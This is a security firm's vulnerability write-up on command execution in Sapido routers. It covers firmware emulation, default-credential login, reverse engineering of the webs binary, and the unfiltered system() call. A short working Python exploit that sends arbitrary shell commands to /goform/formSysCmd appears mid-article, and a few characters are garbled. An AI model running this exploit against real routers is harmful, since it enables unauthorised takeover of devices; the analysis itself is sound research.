Sapdio路由器命令执行分析





首页 产品与服务 解决方案 客户案例 技术支持 合作发展 关于黄金城 用户退出 合作商登录 用户登录 申请试用

数据黄金城官网


数据库保险箱数据黄金城官网分类分级平台数据黄金城官网综合评估系统新一代数据黄金城官网一体化平台
存储域
数据库加密诺亚防勒索
访问域
数据库防水坝数据库防火墙数据库黄金城官网审计动态脱敏
流动域
静态脱敏数据水印 API审计 API防控医疗防统方
运行黄金城官网


新一代灾备一体化平台灾备一键通数据库运行黄金城官网管理平台
数据流动


数据流动平台静态脱敏数据水印
黄金城官网运维服务



运维服务
数据库运维服务中间件运维服务国产信创改造服务驻场运维服务供数服务
黄金城官网咨询服务
数据出境黄金城官网治理服务数据黄金城官网能力评估认证服务数据黄金城官网风险评估服务数据黄金城官网治理咨询服务数据分类分级咨询服务个人信息风险评估服务数据黄金城官网检查服务

行业解决方案政府解决方案金融解决方案医疗解决方案教育解决方案能源解决方案物流交通解决方案

售后服务文档中心年度培训

渠道政策申请成为合作伙伴渠道专区

公司动态行业资讯黄金城官网研究

热门阅读

用AI重新定义数据黄金城官网监测，让数据黄金城官网变简单

2026-03-17

金融机构数据黄金城官网能力体系建设与落地实践

2026-02-27

开工大吉｜策马扬鞭，跃启新程！

2026-02-25

浙江省委宣传部副部长、省委网信办主任赵磊：守正创新辩证施策全力推动网络生态治理工作迈上新台阶

2026-02-10

黄金城产品全面入围中直机关2025年网络设备框架协议采购项目

2026-02-04

相关文章

每周黄金城官网速递??? | 密西西比大学医学中心在遭受勒索软件攻击后恢复正常运营

2026-03-09

每周黄金城官网速递??? | LockBit5.0版本支持Windows、Linux与ESXi平台

2026-03-09

每周黄金城官网速递??? | Osiris勒索软件利用BYOVD技术禁用黄金城官网工具

2026-02-02

每周黄金城官网速递??? | DeadLock勒索软件团伙利用Polygon智能合约存储代理服务器地址

2026-01-19

每周黄金城官网速递??? | 勒索软件攻击导致心理健康机构超11万人数据泄露

2026-01-06

Sapdio路由器命令执行分析

发布时间：2023-03-10 阅读次数： 1137 次

前言

金智洋Sapido是台湾钢铁集团专为 IoT 物联网技术所投资的品牌科技公司，专门设计开发智慧全无线保全系统及硬体设备，同时拥有APP的研发能力，跨足智慧家庭 SMART HOME TOTAL SOLUTION 及智能制造 & ERP等全方位企业整合方案，提供无线分享器网通产品、智慧插座、监控保全等产品。金智洋Sapido凭藉专业的研发团队及行销市场的规划，深耕台湾，坚持台湾制造，并荣获台湾唯一拥有MIT微笑标章的网路通讯企业，且至今已累积50座台湾精品奖的殊荣，获颁台湾精品终身成就奖。

2019年该旗下多个型号路由器存在未授权命令执行漏洞，可被黑客进行恶意利用。主要影响的版本为BR270n-v2.1.03、BRC76n-v2.1.03、GR297-v2.1.3、RB1732-v2.0.43及之前的版本。

固件环境模拟

在这里该固件的环境模拟主要通过firmware-analysis-toolkit工具实现，该工具集成了主流的几款自动化固件模拟工具。这里推荐大家下载attifyos3.0，其中已安装firmware-analysis-toolkit工具

attifyos3.0下载地址：https://pan.baidu.com/s/1-UQOBax1-t8EFVrzGvEhVQ提取码：zshs

本次漏洞分析所使用的固件版本为：RB-1732_TC_v2.0.43

固件下载地址：https://share.weiyun.com/5Z9kOYc

进入attifyos虚拟机中，切换目录至～/tools/firmware-analysis-toolkit

将RB-1732_TC_v2.0.43.bin放置到虚拟机中，在这里我的位置为/home/iot/Desktop/firewalk/RB-1732_TC_v2.0.43.bin

在命令行中执行 python3 fat.py /home/iot/Desktop/firewalk/RB-1732_TC_v2.0.43.bin

这里首先会进行网络的自动化配置，当显示br0的网络地址时，表示模拟器网络已配置好，记住此时的br0地址为192.168.1.1

此时回车，进行固件的部署，稍等片刻，显示如下图则表示环境已部署完成

访问http://192.168.1.1/admin.asp，此时显示路由器的管理页面，默认账号密码为admin:admin，表示环境已模拟完成

漏洞复现

使用admin:admin默认账号登录后台，页面显示如下

接下来访问http://192.168.1.1/syscmd.asp，进入到命令执行页

输入ifconfig命令，成功执行

通过漏洞利用脚本执行结果如下

rb1732_exploit.py脚本内容如下

import requestsimport sysdef test_httpcommand(ip, command):  my_data = {'sysCmd': command, 'apply': 'Apply', 'submit-url':'/syscmd.asp', 'msg':''}  r = requests.post('http://%s/goform/formSysCmd' % ip, data = my_data)  content = r.text  content = content[    content.find('<textarea rows="15" name="msg" cols="80" wrap="virtual">')+56:  content.rfind('</textarea>')]  return content print test_httpcommand(sys.argv[1], " ".join(sys.argv[2:]))

漏洞分析

根据syscmd.asp页面，输入ifconfig命令，抓包可知，真正执行命令的后台程序为/goform/formSysCmd，命令的参数名为sysCmd。

接下来使用binwalk进行固件提�。⑹越性绰敕治�，命令为binwalk -Me RB-1732_TC_v2.0.43.bin

提取完成后，会生成_RB-1732_TC_v2.0.43.bin.extracted目录，其中保存有固件的源码

进入到_RB-1732_TC_v2.0.43.bin.extracted/squashfs-root中，grep -r "formSysCmd"，全局查找存在该字符的位置

可以看到，除了syscmd.asp和obama.asp页面程序，只有bin/webs文件匹配到，初步判断webs程序才是真正的后台处理程序

file bin/webs，查看程序文件格式，为mips 32位程序

将webs文件拷贝出来，导入ida进行静态分析，view -> open subviews -> Strings查看全部字符串

crtl +F 查找formSyscmd字段

可以看到有2个位置存在该字段，分别位于004044DB和00471A44两个位置，首先双击004044DB的位置进入

继续双击formSysCmd，进入该函数的定义

F5进行反编译查看伪代码

到这里我们可以清楚地看到，formSysCmd函数通过websGetVar函数获取用户的输入，包括有submit_url、sysCmd、writeData、filename、fpath、readfile的参数值。其中v3为sysCmd的参数值

接下来在没有过滤v3值的情况下，通过snprintf格式化拼接字符串，得到 v20= &v3 2>&1 > /tmp/syscmd.log
最终调用system函数执行v20的字符串。
这里将v3设置成ifconfig，我们在本地执行查看效果，可以看到命令成功执行，并将结果返回到syscmd.log，因此只要命令在syscmd参数位置输入系统命令，则可导致命令执行漏洞

上一条：每周黄金城官网速递???|黑客声称出售宏碁160G泄露数据
下一条：黄金城科技发布《2023年2月勒索病毒威胁报告》

返回

快速入口

免费试用售后服务客户案例文档中心年度培训
热门产品

新一代灾备一体化平台数据流动平台数据库运行黄金城官网管理平台新一代数据黄金城官网一体化平台数据黄金城官网治理咨询服务数据分类分级咨询服务
解决方案

政府解决方案金融解决方案医疗解决方案教育解决方案能源解决方案物流交通解决方案
合作发展

渠道政策合作申请渠道专区
关于黄金城

关于我们大事记最新动态加入我们联系我们

关注或联系黄金城

官方订阅号

官方服务号

第59号

服务热线：400-811-3777

商务合作：marketing@mchz.com.cn

友情链接中央网信办公安部工信部 CNCERT 中国信通院中国软件测评中心国家工业信息黄金城官网发展研究中心赛迪研究院

Copyright ? 2024 杭州黄金城科技股份有限公司 All rights reserved.

浙公网安备 33010502006954号浙ICP备12021012号-1 网站地图网站声明及隐私保护政策

免费试用

服务热线

马上咨询

400-811-3777



【网站地图】【sitemap】